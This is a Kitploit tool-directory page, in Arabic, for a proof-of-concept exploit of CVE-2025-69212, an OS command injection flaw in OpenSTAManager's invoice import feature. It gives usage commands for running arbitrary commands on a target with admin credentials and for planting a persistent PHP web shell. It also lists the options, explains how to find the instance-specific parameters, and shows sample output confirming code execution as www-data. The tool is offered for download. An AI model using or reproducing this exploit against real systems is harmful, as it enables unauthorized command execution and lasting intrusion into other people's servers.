Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-69212-PoC — CVE-2025-69212 - PoC لحقن أوامر نظام التشغيل في OpenSTAManager | Kitploit
أدوات/GitHubGitHub/alaeddine03/cve-2025-69212-poc
توليد الحمولةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرة
GitHubalaeddine03/cve-2025-69212-poc

CVE-2025-69212-PoC

CVE-2025-69212 - PoC لحقن أوامر نظام التشغيل في OpenSTAManager

عرض المستودع
48منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-69212 - إثبات المفهوم لحقن أوامر نظام التشغيل في OpenSTAManager

الاستخدام

تثبيت التبعيات:

root@kitploit:~
pip install -r requirements.txt

تشغيل أمر واحد وعرض مخرجه:

root@kitploit:~
python3 cve-2025-69212_poc.py -u http://target.com -U admin -P 'password' -c 'id'

بدلاً من ذلك، قم بزرع قشرة ويب PHP دائمة:

root@kitploit:~
python3 cve-2025-69212_poc.py -u http://target.com -U admin -P 'password' --shell

الخيارات

الخيارالوصف
-u, --urlعنوان URL الأساسي للمثيل المستهدف
-U, --usernameاسم المستخدم للمصادقة
-P, --passwordكلمة المرور للمصادقة
-c, --commandالأمر المراد تنفيذه، ويُحفظ مخرجه في pwn_out.txt
--shellزرع قشرة ويب PHP في files/shell.php بدلاً من تشغيل أمر واحد
--id-moduleمعرّف الوحدة لميزة استيراد الفواتير (الافتراضي: 14)
--id-pluginمعرّف الإضافة لميزة استيراد الفواتير (الافتراضي: 48)

تُعد id_module وid_plugin خاصين بكل مثيل. إذا لم تعمل القيم الافتراضية، فسجّل الدخول إلى واجهة الويب الخاصة بالهدف، وانتقل إلى ميزة استيراد الفواتير الإلكترونية، وتحقق من معاملات الطلب في تبويب الشبكة في متصفحك.

مثال على المخرجات

root@kitploit:~
$ python3 cve-2025-69212_poc.py -u http://target.com -U admin -P 'password' -c 'id'
[*] Logging in as admin ...
[+] Authenticated.
[*] Building payload to run: id
[*] Uploading exploit ZIP to id_module=14 id_plugin=48 ...
[*] Server responded: HTTP 500 (500 after command execution is expected)
[*] Fetching command output from http://target.com/files/pwn_out.txt ...
[+] Command output:
--------------------------------------------------
uid=33(www-data) gid=33(www-data) groups=33(www-data)
--------------------------------------------------
تنزيل الأداة